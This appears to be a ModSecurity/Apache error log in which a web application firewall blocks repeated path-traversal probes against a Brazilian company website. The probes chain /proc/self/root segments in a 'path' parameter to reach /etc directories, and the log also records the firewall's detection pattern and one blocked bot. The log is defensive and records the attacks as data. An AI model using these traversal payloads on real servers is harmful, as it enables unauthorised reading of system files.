[Mon Mar 16 16:36:07.218578 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.241.46:54342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbp6QpVkWug9HeOt9IXwAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:36:07.505310 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.243.203:47724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbp6TCbgAP5jq5Teg-0gAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:12.361609 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:47738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbrKQpVkWug9HeOt9IbQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:13.675123 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:56724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbraQpVkWug9HeOt9IcAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:14.925154 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.243.203:56736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbrs_BxrYCr4hPDw_9RgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:16.081785 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:56750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbsLysWC90G-1nBrBWTQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:17.258448 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.243.203:56766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbsUr9dMAiw-8KANNZFgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:18.546968 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:56778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbss_BxrYCr4hPDw_9RwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:21.913512 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:58932] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbtaQpVkWug9HeOt9IdwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:21.968130 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:56790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbtdSswJuvopo3lOhxqQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:23.152211 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.228.16:58604] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhbt_9ocpUE4ed4uDwE3AAAAhU"]
[Mon Mar 16 16:36:23.236249 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:58542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbt8_BxrYCr4hPDw_9SQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:26.611791 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:58554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbuv9ocpUE4ed4uDwE4gAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:28.025104 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:58562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbvKTCbgAP5jq5Teg-6gAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:29.350987 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:58576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbvf9ocpUE4ed4uDwE5QAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:30.527573 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.243.203:42722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbvqQpVkWug9HeOt9IfgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:31.844390 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.243.203:42734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbv6QpVkWug9HeOt9IfwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:35.217384 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:42740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbw6TCbgAP5jq5Teg-_QAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:38.678698 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:42756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbxlajLEzk2WiQ-10lrQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:40.003615 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:42770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbyFajLEzk2WiQ-10lrwAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:41.231551 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:36618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbyf9ocpUE4ed4uDwE7AAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:42.446076 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.243.203:36634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbylajLEzk2WiQ-10lsAAAAok"], referer: 